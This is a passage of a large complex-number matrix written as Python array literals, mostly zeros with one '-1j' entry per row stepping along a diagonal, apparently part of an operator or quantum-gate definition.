0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
